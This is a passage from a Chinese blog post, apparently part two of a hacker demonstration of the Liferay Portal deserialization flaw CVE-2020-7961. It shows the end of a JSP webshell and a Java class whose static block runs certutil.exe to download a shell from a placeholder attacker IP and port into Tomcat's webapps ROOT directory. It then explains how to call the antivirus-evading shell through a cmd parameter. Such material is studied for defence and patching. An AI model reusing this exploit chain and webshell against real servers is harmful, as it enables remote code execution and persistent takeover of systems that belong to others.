黑客演示CVE-2020-7961_Liferay Portal反序列化漏洞( 二 )


int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
替换编译下面的java:

public class LifExp {
static {
try {
String[] cmd = {"cmd.exe", "/c", "certutil.exe -urlcache -split -f", "http://IP:端口/jspshell.txt", "..\webapps\ROOT\jspshell.jsp"};
java.lang.Runtime.getRuntime().
exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
}
第四行,Windows下使用certutil.exe可以实现文件下载,curl功能 。
因为当前靶机执行命令的路径是 tomcatbin 所以我们下载webshell的时候,一定要下载到index.jsp相同路径便于我们访问,也就是 tomcat-9.0.17webappsROOT。
执行了命令之后,我们在这个文件夹下面已经可以看到我们的shell了:
黑客演示CVE-2020-7961_Liferay Portal反序列化漏洞

文章插图
 
而这个时候我们已经可以正常访问shell了:
黑客演示CVE-2020-7961_Liferay Portal反序列化漏洞

文章插图
 
因为用的免杀shell用法?cmd=cmd /c 命令,所以需要进行url编码才可用 。

【黑客演示CVE-2020-7961_Liferay Portal反序列化漏洞】


推荐阅读